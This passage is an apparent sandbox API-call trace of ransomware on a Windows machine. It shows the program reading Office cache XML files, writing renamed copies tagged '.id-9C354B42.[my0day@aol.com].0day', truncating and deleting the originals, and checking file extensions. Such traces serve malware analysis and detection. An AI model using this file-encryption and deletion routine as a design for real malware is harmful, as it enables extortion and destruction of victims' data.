(lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.212] lstrlenW (lpString=".dbf") returned 4 [0034.212] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.212] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.212] lstrlenW (lpString=".1cd") returned 4 [0034.212] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.212] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.212] lstrlenW (lpString=".jpg") returned 4 [0034.212] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.212] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.212] lstrlenW (lpString="Setup.xml") returned 9 [0034.212] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.213] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2362) returned 1 [0034.213] CloseHandle (hObject=0x188) returned 1 [0034.213] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.213] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.213] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.213] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.213] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.213] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.213] GetLastError () returned 0x0 [0034.213] ReadFile (in: hFile=0x188, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x93a, lpOverlapped=0x0) returned 1 [0034.215] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x940, lpOverlapped=0x0) returned 1 [0034.216] ReadFile (in: hFile=0x188, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.216] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.216] SetEndOfFile (hFile=0x198) returned 1 [0034.216] CloseHandle (hObject=0x198) returned 1 [0034.217] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.217] SetEndOfFile (hFile=0x188) returned 1 [0034.218] CloseHandle (hObject=0x188) returned 1 [0034.218] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.218] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.219] lstrlenW (lpString=".doc") returned 4 [0034.219] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.219] lstrlenW (lpString=".docx") returned 5 [0034.219] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.219] lstrlenW (lpString=".pdf") returned 4 [0034.219] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.219] lstrlenW (lpString=".xls") returned 4 [0034.219] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.219] lstrlenW (lpString=".xlsx") returned 5 [0034.219] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.219] lstrlenW (lpString=".ppt") returned 4 [0034.219] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.219] lstrlenW (lpString=".zip") returned 4 [0034.219] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.219] lstrlenW (lpString=".rar") returned 4 [0034.219] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.219] lstrlenW (lpString=".bz2") returned 4 [0034.219] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.219] lstrlenW (lpString=".7z") returned 3 [0034.219] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.219] lstrlenW (lpString=".dbf") returned 4 [0034.219] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.220] lstrlenW (lpString=".1cd") returned 4 [0034.220] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.220] lstrlenW (lpString=".jpg") returned 4 [0034.220] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.220] lstrlenW (lpString=".doc") returned 4 [0034.220] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString=".docx") returned 5 [0034.220] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.220] lstrlenW (lpString=".pdf") returned 4 [0034.220] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString=".xls") returned 4 [0034.220] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString=".xlsx") returned 5 [0034.220] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.220] lstrlenW (lpString=".ppt") returned 4 [0034.220] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.220] lstrlenW (lpString=".zip") returned 4 [0034.220] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.220] lstrlenW (lpString=".rar") returned 4 [0034.220] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString=".bz2") returned 4 [0034.220] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString=".7z") returned 3 [0034.220] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.220] lstrlenW (lpString=".dbf") returned 4 [0034.220] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.220] lstrlenW (lpString=".1cd") returned 4 [0034.221] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.221] lstrlenW (lpString=".jpg") returned 4 [0034.221] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.221] Sleep (dwMilliseconds=0x64) [0034.543] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.543] lstrlenW (lpString="InfoPathMUI.xml") returned 15 [0034.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.663] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1231) returned 1 [0034.663] CloseHandle (hObject=0x170) returned 1 [0034.663] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020 [0034.663] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.663] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.663] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.663] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.663] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.664] GetLastError () returned 0x0 [0034.664] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x4cf, lpOverlapped=0x0) returned 1 [0034.665] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0034.666] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.666] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0034.666] SetEndOfFile (hFile=0x18c) returned 1 [0034.666] CloseHandle (hObject=0x18c) returned 1 [0034.667] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.667] SetEndOfFile (hFile=0x170) returned 1 [0034.667] CloseHandle (hObject=0x170) returned 1 [0034.668] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.668] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0034.668] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.668] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.668] lstrlenW (lpString=".doc") returned 4 [0034.668] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.668] lstrlenW (lpString=".docx") returned 5 [0034.668] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.668] lstrlenW (lpString=".pdf") returned 4 [0034.668] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.668] lstrlenW (lpString=".xls") returned 4 [0034.668] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.668] lstrlenW (lpString=".xlsx") returned 5 [0034.668] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.668] lstrlenW (lpString=".ppt") returned 4 [0034.668] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.668] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.668] lstrlenW (lpString=".zip") returned 4 [0034.668] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.668] lstrlenW (lpString=".rar") returned 4 [0034.668] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.668] lstrlenW (lpString=".bz2") returned 4 [0034.668] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString=".7z") returned 3 [0034.669] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.669] lstrlenW (lpString=".dbf") returned 4 [0034.669] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.669] lstrlenW (lpString=".1cd") returned 4 [0034.669] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.669] lstrlenW (lpString=".jpg") returned 4 [0034.669] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.669] lstrlenW (lpString=".doc") returned 4 [0034.669] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString=".docx") returned 5 [0034.669] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.669] lstrlenW (lpString=".pdf") returned 4 [0034.669] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString=".xls") returned 4 [0034.669] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString=".xlsx") returned 5 [0034.669] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.669] lstrlenW (lpString=".ppt") returned 4 [0034.669] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.669] lstrlenW (lpString=".zip") returned 4 [0034.669] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.669] lstrlenW (lpString=".rar") returned 4 [0034.669] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString=".bz2") returned 4 [0034.669] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.669] lstrlenW (lpString=".7z") returned 3 [0034.669] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.670] lstrlenW (lpString=".dbf") returned 4 [0034.670] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.670] lstrlenW (lpString=".1cd") returned 4 [0034.670] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0034.670] lstrlenW (lpString=".jpg") returned 4 [0034.670] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.670] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.670] lstrlenW (lpString="OneNoteMUI.xml") returned 14 [0034.670] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.671] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1606) returned 1 [0034.671] CloseHandle (hObject=0x170) returned 1 [0034.671] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020 [0034.671] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.671] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.671] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.671] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.671] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.671] GetLastError () returned 0x0 [0034.671] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x646, lpOverlapped=0x0) returned 1 [0034.673] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x650, lpOverlapped=0x0) returned 1 [0034.674] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.674] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.674] SetEndOfFile (hFile=0x18c) returned 1 [0034.674] CloseHandle (hObject=0x18c) returned 1 [0034.675] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.675] SetEndOfFile (hFile=0x170) returned 1 [0034.676] CloseHandle (hObject=0x170) returned 1 [0034.676] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.676] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0034.676] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.676] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.676] lstrlenW (lpString=".doc") returned 4 [0034.676] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.676] lstrlenW (lpString=".docx") returned 5 [0034.676] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.676] lstrlenW (lpString=".pdf") returned 4 [0034.676] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.676] lstrlenW (lpString=".xls") returned 4 [0034.676] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.677] lstrlenW (lpString=".xlsx") returned 5 [0034.677] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.677] lstrlenW (lpString=".ppt") returned 4 [0034.677] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.677] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.677] lstrlenW (lpString=".zip") returned 4 [0034.677] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.677] lstrlenW (lpString=".rar") returned 4 [0034.677] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.677] lstrlenW (lpString=".bz2") returned 4 [0034.677] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.677] lstrlenW (lpString=".7z") returned 3 [0034.677] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.677] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.677] lstrlenW (lpString=".dbf") returned 4 [0034.677] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.677] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.677] lstrlenW (lpString=".1cd") returned 4 [0034.677] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.677] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.677] lstrlenW (lpString=".jpg") returned 4 [0034.677] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.677] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.677] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.678] lstrlenW (lpString=".doc") returned 4 [0034.678] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString=".docx") returned 5 [0034.678] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.678] lstrlenW (lpString=".pdf") returned 4 [0034.678] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString=".xls") returned 4 [0034.678] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString=".xlsx") returned 5 [0034.678] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.678] lstrlenW (lpString=".ppt") returned 4 [0034.678] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.678] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.678] lstrlenW (lpString=".zip") returned 4 [0034.678] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 